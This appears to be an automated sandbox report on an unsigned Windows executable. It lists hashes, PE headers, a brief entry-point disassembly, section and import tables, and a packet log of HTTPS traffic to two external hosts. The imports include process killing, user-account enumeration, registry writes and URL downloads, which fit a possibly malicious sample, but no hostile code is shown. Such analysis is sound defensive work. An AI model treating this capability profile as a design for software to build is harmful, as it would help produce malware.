                                                                                                                                                                        SHA1:2fdb1f235fc5a9a32477dab4220ece5fda1539d4
                                                                                                                                                                        SHA256:0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630
                                                                                                                                                                        SHA512:e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba
                                                                                                                                                                        SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                        TLSH:E5D45C1666A800FCE1EBD238CA574513FA76B84603A19ADF13D097672F176E09F3E721
                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B........v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw.....
                                                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                                                        Entrypoint:0x14004320c
                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                        Time Stamp:0x6731B531 [Mon Nov 11 07:41:37 2024 UTC]
                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                        File Version Major:6
                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                        Import Hash:b1d65f7e4aa92d9c11708d0d9ee127a1
                                                                                                                                                                        Instruction
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                        call 00007F9DE9027C88h
                                                                                                                                                                        dec eax
                                                                                                                                                                        add esp, 28h
                                                                                                                                                                        jmp 00007F9DE90273DFh
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                        dec ebp
                                                                                                                                                                        mov eax, dword ptr [ecx+38h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ecx, edx
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                        call 00007F9DE9027572h
                                                                                                                                                                        mov eax, 00000001h
                                                                                                                                                                        dec eax
                                                                                                                                                                        add esp, 28h
                                                                                                                                                                        ret
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        int3
                                                                                                                                                                        inc eax
                                                                                                                                                                        push ebx
                                                                                                                                                                        inc ebp
                                                                                                                                                                        mov ebx, dword ptr [eax]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ebx, edx
                                                                                                                                                                        inc ecx
                                                                                                                                                                        and ebx, FFFFFFF8h
                                                                                                                                                                        dec esp
                                                                                                                                                                        mov ecx, ecx
                                                                                                                                                                        inc ecx
                                                                                                                                                                        test byte ptr [eax], 00000004h
                                                                                                                                                                        dec esp
                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                        je 00007F9DE9027575h
                                                                                                                                                                        inc ecx
                                                                                                                                                                        mov eax, dword ptr [eax+08h]
                                                                                                                                                                        dec ebp
                                                                                                                                                                        arpl word ptr [eax+04h], dx
                                                                                                                                                                        neg eax
                                                                                                                                                                        dec esp
                                                                                                                                                                        add edx, ecx
                                                                                                                                                                        dec eax
                                                                                                                                                                        arpl ax, cx
                                                                                                                                                                        dec esp
                                                                                                                                                                        and edx, ecx
                                                                                                                                                                        dec ecx
                                                                                                                                                                        arpl bx, ax
                                                                                                                                                                        dec edx
                                                                                                                                                                        mov edx, dword ptr [eax+edx]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov eax, dword ptr [ebx+10h]
                                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov eax, dword ptr [ebx+08h]
                                                                                                                                                                        test byte ptr [ecx+eax+03h], 0000000Fh
                                                                                                                                                                        je 00007F9DE902756Dh
                                                                                                                                                                        movzx eax, byte ptr [ecx+eax+03h]
                                                                                                                                                                        and eax, FFFFFFF0h
                                                                                                                                                                        dec esp
                                                                                                                                                                        add ecx, eax
                                                                                                                                                                        dec esp
                                                                                                                                                                        xor ecx, edx
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov ecx, ecx
                                                                                                                                                                        pop ebx
                                                                                                                                                                        jmp 00007F9DE9026A3Ah
                                                                                                                                                                        int3
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov eax, esp
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+08h], ebx
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+10h], ebp
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+18h], esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov dword ptr [eax+20h], edi
                                                                                                                                                                        inc ecx
                                                                                                                                                                        push esi
                                                                                                                                                                        dec eax
                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov ebx, dword ptr [ecx+38h]
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov esi, edx
                                                                                                                                                                        dec ebp
                                                                                                                                                                        mov esi, eax
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ebp, ecx
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov edx, ecx
                                                                                                                                                                        dec eax
                                                                                                                                                                        mov ecx, esi
                                                                                                                                                                        dec ecx
                                                                                                                                                                        mov edi, ecx
                                                                                                                                                                        dec esp
                                                                                                                                                                        lea eax, dword ptr [ebx+04h]
                                                                                                                                                                        call 00007F9DE90274D1h
                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x8be980xb4.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x960000x448.rsrc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x910000x4c74.pdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x970000xb90.reloc
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x804800x70.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x806800x28.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x803400x140.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x700000x4a8.rdata
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                        .text0x10000x6ec3e0x6ee00e5d9e86ceef61c40af75d00b1338553dFalse0.4871956912344983data6.39857414841088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rdata0x700000x1ce640x1d000cc5419dfe862265139bacec5ab07010eFalse0.44227337015086204data5.432264074009666IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .data0x8d0000x3bec0x1c00cd69d42d368ffc43ed3d9449389d5e0dFalse0.16378348214285715DOS executable (block device driver)3.2710072108015398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                        .pdata0x910000x4c740x4e00eb4cdabd0756133d95aec7355655271aFalse0.4788661858974359data5.735627608296407IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .rsrc0x960000x4480x6001e9590800244ea67bbd5f82b3a6f4221False0.3580729166666667data3.380125227099815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                        .reloc0x970000xb900xc005ce72d9d30afddbdf14b43241fe9c99bFalse0.4889322916666667data5.370062744008093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                        RT_VERSION0x960a00x220dataEnglishUnited States0.5036764705882353
                                                                                                                                                                        RT_MANIFEST0x962c00x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                                                                                                        DLLImport
                                                                                                                                                                        KERNEL32.dllGetEnvironmentVariableW, InitializeCriticalSectionEx, FindClose, OpenProcess, CreateToolhelp32Snapshot, GetLastError, Process32NextW, K32GetModuleBaseNameW, DeleteFileW, Process32FirstW, CloseHandle, TerminateProcess, DecodePointer, DeleteCriticalSection, ExitProcess, CreateProcessW, WideCharToMultiByte, GetConsoleWindow, K32EnumProcessModules, MultiByteToWideChar, WriteConsoleW, SetEndOfFile, GetProcessHeap, SetEnvironmentVariableW, FindNextFileW, FindFirstFileW, K32EnumProcesses, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, HeapSize, HeapReAlloc, GetTimeZoneInformation, SetStdHandle, ReadConsoleW, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, LocalFree, FormatMessageA, GetLocaleInfoEx, CreateDirectoryW, CreateFileW, FindFirstFileExW, GetFileAttributesExW, SetFileInformationByHandle, AreFileApisANSI, GetModuleHandleW, GetProcAddress, GetFileInformationByHandleEx, QueryPerformanceCounter, QueryPerformanceFrequency, GetStringTypeW, GetCurrentThreadId, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, SleepConditionVariableSRW, Sleep, WaitForSingleObjectEx, GetExitCodeThread, GetSystemTimeAsFileTime, EnterCriticalSection, LeaveCriticalSection, EncodePointer, LCMapStringEx, WakeAllConditionVariable, GetCPInfo, IsDebuggerPresent, OutputDebugStringW, RaiseException, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, GetStartupInfoW, GetCurrentProcessId, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetFileType, ReadFile, GetModuleFileNameW, GetStdHandle, WriteFile, GetFileSizeEx, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, HeapFree, HeapAlloc, RtlUnwind
                                                                                                                                                                        USER32.dllShowWindow
                                                                                                                                                                        ADVAPI32.dllRegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                                                                                                                        ole32.dllCoInitialize, CoInitializeEx, CoCreateInstance, CoUninitialize
                                                                                                                                                                        OLEAUT32.dllSysFreeString, SysAllocString, VariantClear, VariantInit
                                                                                                                                                                        WS2_32.dllWSAStartup, WSACleanup, gethostname
                                                                                                                                                                        NETAPI32.dllNetUserEnum, NetApiBufferFree
                                                                                                                                                                        WININET.dllInternetOpenUrlA, InternetCloseHandle, InternetOpenA, InternetReadFile
                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                        Dec 12, 2024 16:53:42.380047083 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:42.380078077 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:42.380620003 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:42.391132116 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:42.391148090 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:42.511833906 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:42.511871099 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:42.512007952 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:42.520970106 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:42.520987034 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.086880922 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.086961031 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.087908030 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.088202953 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.215218067 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.215346098 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.216022968 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.216079950 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.378432035 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.378458977 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.378801107 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.380908012 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.394994020 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.435336113 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.515146017 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.515171051 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.515543938 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:44.515887976 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.517375946 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:44.563328028 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.123035908 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.123168945 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.123194933 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.123203993 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.123337984 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.123538017 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.123538017 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.123558044 CET44349717172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.123619080 CET49717443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.246855021 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.246932983 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.246936083 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.247000933 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.247189045 CET49718443192.168.2.9172.217.17.46
                                                                                                                                                                        Dec 12, 2024 16:53:45.247205019 CET44349718172.217.17.46192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.266376019 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:45.266423941 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.266494989 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:45.266864061 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:45.266882896 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.296844959 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:45.296904087 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:45.296972036 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:45.297213078 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:45.297224998 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:46.963823080 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:46.963927031 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:46.988698006 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:46.988809109 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.038790941 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.038804054 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:47.039149046 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:47.039233923 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.039639950 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.041532993 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.041562080 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:47.041850090 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:47.041894913 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.042310953 CET49725443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:47.083322048 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:47.083331108 CET44349725142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.726685047 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.726892948 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.740134001 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.740338087 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.846580029 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.846647978 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.846678972 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.846719027 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.849123001 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.849169970 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.918781042 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.918857098 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.922785997 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.922832012 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.922842026 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.922918081 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.928234100 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.928282022 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.936345100 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.936392069 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.937606096 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.937668085 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.942918062 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.942954063 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.947439909 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.947484970 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.955485106 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.955545902 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.961124897 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.961179972 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.965104103 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.965147972 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.974808931 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.974862099 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.977857113 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.977919102 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.989090919 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.989155054 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:49.991131067 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:49.991190910 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.002166033 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.002228022 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.005255938 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.005315065 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.015782118 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.015844107 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.018959045 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.019021988 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.029498100 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.029561996 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.038574934 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.038649082 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.043174028 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.043230057 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.043276072 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.043353081 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.056611061 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.056672096 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.080535889 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.080609083 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.080643892 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.080713987 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.110346079 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.110421896 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.110467911 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.110515118 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.112473011 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.112530947 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.116976976 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.117033005 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.117054939 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.117099047 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.120716095 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.120770931 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.120876074 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.121058941 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.131329060 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.131398916 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.132565022 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.132625103 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.132632971 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.132688999 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.141911030 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.142070055 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.142107964 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.142164946 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.152641058 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.152709961 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.152769089 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.152853966 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.162832022 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.162892103 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.162915945 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.163069963 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.173242092 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.173310995 CET49724443192.168.2.9142.250.181.65
                                                                                                                                                                        Dec 12, 2024 16:53:50.173335075 CET44349724142.250.181.65192.168.2.9
                                                                                                                                                                        Dec 12, 2024 16:53:50.173474073 CET49724443192.168.2.9142.250.181.65
